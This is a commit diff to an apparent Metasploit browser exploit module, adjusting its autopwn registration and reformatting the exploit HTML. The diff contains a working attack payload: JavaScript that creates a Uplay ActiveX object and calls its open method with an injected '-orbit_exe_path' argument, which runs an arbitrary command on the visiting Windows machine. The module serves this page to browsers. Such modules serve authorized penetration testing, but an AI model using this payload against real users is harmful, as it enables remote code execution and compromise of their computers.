Fixed to work with browser_autopwn
parent
066020e572
commit
f298dbbd04
|
@ -19,11 +19,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:ua_name => HttpClients::IE,
|
||||
:javascript => true,
|
||||
:rank => NormalRanking,
|
||||
:classid => "{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}", #Asume this is so javascript can check the ActiveX is available?
|
||||
:method => "DownloadImageFileURL", #??
|
||||
:rank => NormalRanking
|
||||
#:classid => "{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}" # Does not get registered in IE properly?
|
||||
})
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -90,7 +88,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
classid = "clsid:1c492e6a-2803-5ed7-83e1-1b1d4d41eb39"
|
||||
type = "application/x-uplaypc" # Unused but alternative to classid
|
||||
content = "<html><body><script>x = document.createElement('OBJECT');x.classid='#{classid}';document.body.appendChild(x);x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play');</script></body></html>"
|
||||
content = %Q|
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
x = document.createElement('OBJECT');
|
||||
x.classid='#{classid}';document.body.appendChild(x);
|
||||
x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play');
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
||||
print_status("Sending exploit HTML")
|
||||
send_response_html(cli, content)
|
||||
|
|
Loading…
Reference in New Issue